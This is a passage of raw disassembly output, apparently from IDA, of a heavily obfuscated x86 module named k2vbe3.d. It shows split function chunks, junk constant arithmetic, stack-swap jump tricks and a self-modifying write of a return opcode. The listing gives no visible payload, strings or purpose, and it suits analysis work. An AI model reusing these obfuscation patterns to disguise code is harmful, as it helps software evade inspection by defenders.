; FUNCTION CHUNK AT 004473E1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004477FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449A5B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A931 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044BD4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D52C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EEA1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F98D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044FACC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451B9E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00451BC6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451DB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520D8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045413F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454517 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F63 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456BC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004571F0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00457C5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E42 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004585E8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458675 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458FF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004593EF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045B761 SIZE 00000005 BYTES

		jb	loc_457E42
		call	sub_43C04E
		test	al, al
		jz	loc_44F98D
		jmp	loc_456BC4
sub_44B2D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	ecx, 0B414E39h
		shl	edx, 14h
		jmp	sub_45458E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_44B2FD:				; CODE XREF: sub_44E971+9131j
		js	loc_446018
		shl	eax, 0Eh

loc_44B306:				; CODE XREF: sub_44E971:loc_454E4Cj
		mov	eax, [ebp-0Ch]
		push	eax
		call	sub_43E282
		jmp	loc_43D851
; END OF FUNCTION CHUNK	FOR sub_44E971
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44B314:				; CODE XREF: sub_446E24:loc_44DE55j
		push	edx
		jmp	loc_443DCE
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_44B31A:				; CODE XREF: k2vbe3.d:00444734j
		jle	loc_44C155

; =============== S U B	R O U T	I N E =======================================



sub_44B320	proc near		; CODE XREF: sub_43C3A9:loc_459548p

; FUNCTION CHUNK AT 004552A9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ecx, 71650FA0h
		push	offset sub_457458
		jmp	loc_4552A9
sub_44B320	endp

; ---------------------------------------------------------------------------

loc_44B334:				; CODE XREF: k2vbe3.d:00449294j
		pop	ebx

; =============== S U B	R O U T	I N E =======================================



sub_44B335	proc near		; CODE XREF: k2vbe3.d:00444901j
					; sub_445FE0+42DAp
		xchg	edi, [esp+0]
		pop	edi
		add	eax, 82175858h
		push	offset loc_45BD06
		jmp	nullsub_65
sub_44B335	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A6

loc_44B349:				; CODE XREF: sub_4554A6:loc_44DE36j
		jmp	ds:off_41E0CC
; END OF FUNCTION CHUNK	FOR sub_4554A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_44B34F:				; CODE XREF: sub_43D023+3AD8j
		jmp	loc_44EFFE
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------

loc_44B354:				; CODE XREF: k2vbe3.d:0043CA15j
		jmp	loc_450496

; =============== S U B	R O U T	I N E =======================================



sub_44B359	proc near		; CODE XREF: sub_44B359:loc_449CE3j
					; sub_4554A6p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C5C0 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00441EAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044725C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449CE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBD1 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044CC8B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044E184 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450745 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B96 SIZE 00000008 BYTES

		pop	edx
		jb	loc_44CC8B
		mov	eax, [esp-4+arg_0]
		push	edx
		push	ecx
		jmp	loc_43C5C0
sub_44B359	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440863

loc_44B36A:				; CODE XREF: sub_440863+14j
		pop	edx
		pop	ecx
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_440863
; ---------------------------------------------------------------------------

loc_44B36E:				; CODE XREF: k2vbe3.d:00448D09j
		jmp	loc_45BFAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_313. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_44B374:				; CODE XREF: sub_4486D7-7EDCj
		jmp	loc_4543C2
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E39

loc_44B379:				; CODE XREF: sub_441E39:loc_43CA0Aj
		push	dword ptr [ebp-10h]
		push	ebx
		push	0FC464154h
		pop	ebx

loc_44B383:				; CODE XREF: k2vbe3.d:loc_44F6E4j
		jmp	loc_44ED03
; END OF FUNCTION CHUNK	FOR sub_441E39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44B388:				; CODE XREF: sub_43DFE1:loc_44A365j
		mov	ebp, [esi]
		jmp	loc_44F97F
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E903

loc_44B38F:				; CODE XREF: sub_44E903+5j
		jmp	ds:off_41E0B0
; END OF FUNCTION CHUNK	FOR sub_44E903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44B395:				; CODE XREF: sub_444B3E+16C1Dj
		jmp	loc_44244E
; END OF FUNCTION CHUNK	FOR sub_444B3E

; =============== S U B	R O U T	I N E =======================================



sub_44B39A	proc near		; CODE XREF: k2vbe3.d:0043C713j
					; sub_44E903p ...

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C718 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446A3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045515A SIZE 00000015 BYTES

		jb	loc_43C718
		push	offset loc_45A564
		jmp	nullsub_66
sub_44B39A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_44B3AA:				; CODE XREF: sub_45A9B3:loc_45A9C0j
		mov	eax, [eax+18h]

loc_44B3AD:				; CODE XREF: sub_45C041:loc_44D18Ej
		dec	eax
		push	ebx
		push	15E84AD6h
		pop	ebx
		jmp	loc_4460B3
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44B3BA:				; CODE XREF: sub_454E69:loc_45409Fj
		pop	ebx
		jmp	loc_44CACB
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_44B3C0	proc near		; CODE XREF: sub_44D0D5:loc_44E7FAp
					; k2vbe3.d:00459513j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044438C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447B0A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F24B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045178B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558DE SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	edx, 0F613CC61h
		push	ebx
		mov	ebx, edx
		jmp	loc_4558DE
sub_44B3C0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_44B3D2:				; CODE XREF: sub_447594+486Bj
		pop	esi
		rol	eax, 18h
		push	ecx
		push	103521E7h
		pop	ecx

loc_44B3DD:				; CODE XREF: k2vbe3.d:loc_43D01Dj
		jmp	loc_45A2D2
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44B3E2:				; CODE XREF: sub_44B999-BD95j
		mov	ecx, eax
		xchg	ecx, [esp+0]
		ror	eax, 13h
		mov	ds:dword_43FA94, eax
		jmp	loc_4550ED
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45485B

loc_44B3F5:				; CODE XREF: sub_45485B+Fj
		mov	eax, 6E103E68h
		call	sub_4553CC
		push	ecx
		mov	ecx, edi
		jmp	loc_43C8BF
; END OF FUNCTION CHUNK	FOR sub_45485B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44B407:				; CODE XREF: sub_44EEFE-155Cj
		pop	eax
		and	eax, 0E88F5FFh
		xor	eax, 1405E2E7h
		add	eax, 0EFBF515Bh
		xchg	eax, [esp+0]
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
		mov	ds:off_41E1FC, eax
		lea	eax, sub_44EEFE
		jmp	loc_442C8F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803D

loc_44B433:				; CODE XREF: sub_44803D+5j
		pop	edi
		jo	loc_44066E
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_446E1E
		jmp	loc_44BF87
; END OF FUNCTION CHUNK	FOR sub_44803D
; ---------------------------------------------------------------------------

loc_44B448:				; CODE XREF: k2vbe3.d:004542D1j
		xchg	esi, ecx

; =============== S U B	R O U T	I N E =======================================



sub_44B44A	proc near		; CODE XREF: sub_44C297:loc_43D23Fp

; FUNCTION CHUNK AT 0043C10E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CA6 SIZE 0000000F BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	esp, 8
		jmp	loc_43C10E
sub_44B44A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44B456:				; CODE XREF: sub_4460FD:loc_44EDC0j
		jo	loc_44CC31

loc_44B45C:				; CODE XREF: sub_45A323:loc_44EDACj
		rol	ecx, 19h
		test	ecx, 8000000h

loc_44B465:				; CODE XREF: k2vbe3.d:loc_43D164j
		jmp	loc_459649
; END OF FUNCTION CHUNK	FOR sub_4460FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B27B

loc_44B46B:				; CODE XREF: sub_45B27B+8j
		jmp	nullsub_417
; END OF FUNCTION CHUNK	FOR sub_45B27B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F70D

loc_44B470:				; CODE XREF: sub_44F70D+12j
		jmp	loc_43DC6A
; END OF FUNCTION CHUNK	FOR sub_44F70D
; ---------------------------------------------------------------------------

loc_44B475:				; CODE XREF: k2vbe3.d:00451B2Fj
		not	eax

; =============== S U B	R O U T	I N E =======================================



sub_44B477	proc near		; CODE XREF: sub_455A4F+56A1p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00454B56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455419 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	esi
		mov	edx, [esp-8+arg_4]
		jmp	loc_455419
sub_44B477	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_44B485:				; CODE XREF: sub_44A0D7+Aj
		jmp	loc_43D5AB
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44B48A:				; CODE XREF: sub_45A323-19A21j
		jz	loc_453CC1
		jmp	loc_45C219
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44B495	proc near		; CODE XREF: sub_43F7AC:loc_44B03Fp
					; k2vbe3.d:0044FAE3j

; FUNCTION CHUNK AT 00443743 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A2F9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451164 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045878A SIZE 00000015 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	esi
		jz	loc_443D4E
		jmp	loc_443743
sub_44B495	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B4A5:				; CODE XREF: k2vbe3.d:loc_447D09j
					; k2vbe3.d:00447D1Bj
		or	edx, 65A65812h
		add	edx, 1A96870Ch
		xchg	edx, [esp]
		jmp	loc_443296
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_44B4B9:				; CODE XREF: sub_4597AE-18A49j
		jnz	loc_456CC0
; END OF FUNCTION CHUNK	FOR sub_4597AE
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44B4BF:				; CODE XREF: sub_447692+EEAAj
		jmp	sub_4536DC
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
		xchg	eax, [edx]
		or	ebp, esi
		mov	edi, 5CCE1811h
		pushf
		mov	edi, ebp
		jmp	loc_456CC0
; ---------------------------------------------------------------------------

loc_44B4D5:				; DATA XREF: sub_446964-6402o
		ror	eax, 7

loc_44B4D8:				; CODE XREF: k2vbe3.d:0044E62Aj
		mov	ds:dword_44281C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44B4DF:				; CODE XREF: sub_442475+Aj
		jmp	loc_448403
; END OF FUNCTION CHUNK	FOR sub_442475

; =============== S U B	R O U T	I N E =======================================



sub_44B4E4	proc near		; CODE XREF: k2vbe3.d:loc_43F279j
					; sub_446964:loc_44054Dp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446492 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451F28 SIZE 00000005 BYTES

		jns	sub_45C0CD
		push	ecx
		mov	ecx, ebp
		jmp	loc_451F28
sub_44B4E4	endp

; ---------------------------------------------------------------------------
		push	offset sub_4404D0
		jmp	locret_450D62
; ---------------------------------------------------------------------------

loc_44B4FC:				; CODE XREF: k2vbe3.d:0044D4BDj
		push	2EF87D02h
		call	loc_45A3CE
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_44B506:				; CODE XREF: sub_4467A1+A670j
		jmp	loc_45B885
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44B50B:				; CODE XREF: sub_447692-AB42j
		jmp	nullsub_85
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44B510:				; CODE XREF: sub_449372+1EFFj
		ror	esi, 7

loc_44B513:				; CODE XREF: sub_449372+1EEDj
		xor	ecx, 2C59EC8Dh
		or	ecx, 0DCAE3A6h
		push	offset sub_459729
		jmp	nullsub_304
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_44B529:				; DATA XREF: sub_457A42-10477o
		xor	eax, 0A80A982Bh
		xchg	eax, [esp]
		push	eax
		call	sub_43FF59

loc_44B538:				; CODE XREF: k2vbe3.d:0044B5B5j
		jmp	loc_4443F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44B53D:				; CODE XREF: sub_456541-11AFDj
		jmp	loc_447843
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_44B542:				; CODE XREF: sub_43C04E:loc_44CD08j
		push	offset sub_4437D3
		jmp	loc_43E6A2
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_44B54C:				; CODE XREF: sub_45000F-1CF3j
		jnz	loc_44792A
		xchg	edi, ecx
		sbb	edi, 0E584E401h
		not	ebp

loc_44B55C:				; CODE XREF: sub_45000F:loc_45721Cj
		push	0EA75A561h
		pop	eax
		sub	eax, 7FC7B2A1h
		jmp	loc_45168E
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_44B56D:				; CODE XREF: sub_44F42B+5576j
		ror	eax, 15h
		mov	ds:dword_44DA38, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44B577:				; CODE XREF: sub_446258-639Aj
		jmp	loc_44792F
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44B57C:				; CODE XREF: sub_44B912-CDD8j
		jmp	loc_4413CA
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_44B581:				; CODE XREF: sub_44F42B+6j
		rol	eax, 15h
		jmp	loc_456A82
; END OF FUNCTION CHUNK	FOR sub_44F42B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_297. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44B58A:				; CODE XREF: k2vbe3.d:00447CE8j
		jmp	loc_43E290

; =============== S U B	R O U T	I N E =======================================



sub_44B58F	proc near		; CODE XREF: k2vbe3.d:0043FD71j
					; sub_454BF9-35BCp

; FUNCTION CHUNK AT 0043EE6E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044410C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454115 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455A30 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A6DF SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 585373A6h
		call	sub_4553CC
		jmp	loc_43EE6E
sub_44B58F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B5A3:				; CODE XREF: k2vbe3.d:0044E1DAj
		sub	esi, 46916A1Ch
		xor	esi, 29D143EBh
		cmp	esi, 132EB5A2h
		jmp	loc_44B538
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF52

loc_44B5BA:				; CODE XREF: sub_43CF52:loc_4511B6j
		mov	eax, ecx
		xchg	eax, [esp+0]
		mov	ecx, [esp+arg_C]
		mov	dword ptr [ecx], 10001h
		jmp	loc_43C7B4
; END OF FUNCTION CHUNK	FOR sub_43CF52
; ---------------------------------------------------------------------------
		or	edx, ebx
		jmp	sub_44C5E3
; ---------------------------------------------------------------------------

locret_44B5D5:				; CODE XREF: k2vbe3.d:loc_45AAB8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_44B5D6:				; CODE XREF: sub_43E135+1BDFBj
		pushf
		jmp	loc_4403A6
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_44B5DC	proc near		; DATA XREF: k2vbe3.d:0045B687o
		mov	[edi], eax
		pop	edi
		push	offset sub_440EA2
		jmp	loc_4593D1
sub_44B5DC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_44B5E9:				; CODE XREF: sub_4504F3-13DB3j
		xchg	edx, edi

loc_44B5EB:				; CODE XREF: sub_4504F3:loc_43C738j
		add	eax, 797310F4h
		xchg	eax, [esp+0]
		jmp	loc_45231A
; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------

loc_44B5F9:				; CODE XREF: k2vbe3.d:0044AFBBj
		xor	esi, edi
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_44B5FB:				; CODE XREF: sub_445F6E:loc_44AFA6j
		rol	edi, 0Ah
		add	edi, 0B3C77C95h
		xchg	edi, [esp-8+arg_4]
		jmp	nullsub_14
; END OF FUNCTION CHUNK	FOR sub_445F6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_44B60C:				; CODE XREF: sub_44D9A7:loc_4423B3j
		pop	ebx
		and	ebx, 0FF3F9460h
		add	ebx, 1E2C2CE4h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_44AD38
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_44B621:				; CODE XREF: sub_4440E5:loc_456B97j
		push	eax
		jmp	loc_45B467
; END OF FUNCTION CHUNK	FOR sub_4440E5

; =============== S U B	R O U T	I N E =======================================



sub_44B627	proc near		; DATA XREF: sub_43F7AC+FE90o
		push	0ED02BA4Ch
		pop	edi
		rol	edi, 9
		or	edi, 0CC57EBE7h
		add	edi, 32CC633Ah
		call	sub_44C678
sub_44B627	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44B641:				; CODE XREF: sub_44C90E+60B5j
		and	esi, ds:4000E8h
		add	esi, 9A4F5017h
		xor	esi, 32FE28EBh
		add	esi, 37698534h
		xchg	esi, [esp+0]
		jmp	loc_445350
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44B661:				; CODE XREF: k2vbe3.d:0043C6FFj
		jge	nullsub_361

; =============== S U B	R O U T	I N E =======================================



sub_44B667	proc near		; CODE XREF: k2vbe3.d:0044FAF1p

; FUNCTION CHUNK AT 00444CA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004493E4 SIZE 00000015 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 0C6F96CEh
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_454115
		jmp	loc_444CA2
sub_44B667	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D910

loc_44B67F:				; CODE XREF: sub_44D910:loc_443BBCj
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44D910
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44B684	proc near		; CODE XREF: sub_45B74D-1EE05p
					; sub_453DB9+5E8Ep
		push	ebp
		push	offset loc_446487
		jmp	nullsub_69
sub_44B684	endp

; ---------------------------------------------------------------------------

loc_44B68F:				; CODE XREF: k2vbe3.d:0045507Dj
		mov	eax, 22143682h
		call	sub_4553CC
		push	ecx
		push	7E4B7136h
		jmp	loc_43D35E
; ---------------------------------------------------------------------------

loc_44B6A4:				; CODE XREF: k2vbe3.d:00458ADAj
		and	edi, eax
		and	eax, ebx
; START	OF FUNCTION CHUNK FOR sub_4508C5

loc_44B6A8:				; CODE XREF: sub_4508C5:loc_458ABEj
		rol	edi, 0Bh
		add	edi, 0B0031A55h
		xchg	edi, [esp+4+var_4]
		jmp	loc_44B71F
; END OF FUNCTION CHUNK	FOR sub_4508C5
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_44EABB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44B6BF:				; CODE XREF: sub_449372:loc_43EBD2j
					; sub_4498C1+E2DEj
		ror	eax, 19h
		jns	loc_446914
		sub	edx, eax
		ror	edx, 0Ah
		and	ebx, ecx
		jmp	loc_43C109
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45634D

loc_44B6D4:				; CODE XREF: sub_45634D-3A2Fj
		mov	eax, [esp+0]
		push	edx
		call	sub_4599AA
		mov	eax, 0CB10B158h
		jmp	loc_454124
; END OF FUNCTION CHUNK	FOR sub_45634D
; ---------------------------------------------------------------------------

loc_44B6E7:				; CODE XREF: k2vbe3.d:004500E0j
		mov	edi, 0B3BB6228h

; =============== S U B	R O U T	I N E =======================================



sub_44B6EC	proc near		; CODE XREF: sub_44CCD8+A81Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00444590 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A840 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044EF09 SIZE 00000009 BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		xchg	ebx, [esp+0]
		mov	edx, ebx
		jmp	loc_444590
sub_44B6EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B6FA:				; CODE XREF: k2vbe3.d:004596DEj
		xchg	ebx, ecx
		popf

loc_44B6FD:				; CODE XREF: k2vbe3.d:00451DEFj
		cmp	edi, ebx
		jmp	loc_44D22B
; ---------------------------------------------------------------------------

locret_44B704:				; CODE XREF: k2vbe3.d:00446E7Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44B705:				; CODE XREF: sub_43DEBE+121EDj
		jmp	loc_4402C6
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457865

loc_44B70A:				; CODE XREF: sub_457865-F358j
		jmp	sub_45A323
; END OF FUNCTION CHUNK	FOR sub_457865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_44B70F:				; CODE XREF: sub_443CD9+9j
		jmp	loc_44616C
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------

loc_44B714:				; CODE XREF: k2vbe3.d:loc_4563C2j
		jge	loc_444E0E
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44B71A:				; CODE XREF: sub_44EEFE+25D4j
		jmp	loc_449C92
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508C5

loc_44B71F:				; CODE XREF: sub_4508C5-5211j
		jmp	sub_4599AA
; END OF FUNCTION CHUNK	FOR sub_4508C5
; ---------------------------------------------------------------------------
		popf
		pop	eax
		jmp	loc_444E08
; ---------------------------------------------------------------------------
		xor	edx, 440D0C56h
		jmp	sub_441850
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459810

loc_44B736:				; CODE XREF: sub_459810:loc_4449F7j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_514
; END OF FUNCTION CHUNK	FOR sub_459810

; =============== S U B	R O U T	I N E =======================================



sub_44B73E	proc near		; CODE XREF: sub_4057E9+2Bp
					; k2vbe3.d:loc_45B00Ej
					; DATA XREF: ...
		push	edx
		push	8A8A2607h
		pop	edx
		and	edx, 8745DAD5h
		add	edx, 7E45AE09h
		call	sub_451CF1
sub_44B73E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453347

loc_44B756:				; CODE XREF: sub_453347+1Dj
					; k2vbe3.d:00453380j
		add	edx, 8C86022Ah
		popf
		xchg	edx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44B765:				; CODE XREF: sub_45A323+91j
		ror	edi, 0Fh
		jmp	loc_458C88
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_44B76D:				; CODE XREF: sub_441D41:loc_43EF09j
		push	ecx
		push	esi
		push	1D88B100h
		pop	esi
		and	esi, 98B9CC5Bh
		cmp	esi, 8971AB97h
		jmp	loc_43CDA6
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_44B786:				; CODE XREF: sub_442DF0+9j
		pop	ebp
		mov	eax, ds:dword_444F1C
		or	eax, eax
		jnz	loc_45159A
		jmp	loc_43C5FD
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_44B79A:				; CODE XREF: sub_43FECA:loc_452170j
		mov	edx, eax
		call	sub_45B74D
		call	sub_4508A3
		or	eax, eax
		jmp	loc_451209
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44B7AD:				; CODE XREF: sub_444B3E+A85Aj
		jns	loc_45B827
		shr	edx, 1Ch

loc_44B7B6:				; CODE XREF: sub_444B3E:loc_451FE2j
		push	offset loc_4476F4
		jmp	loc_4427BA
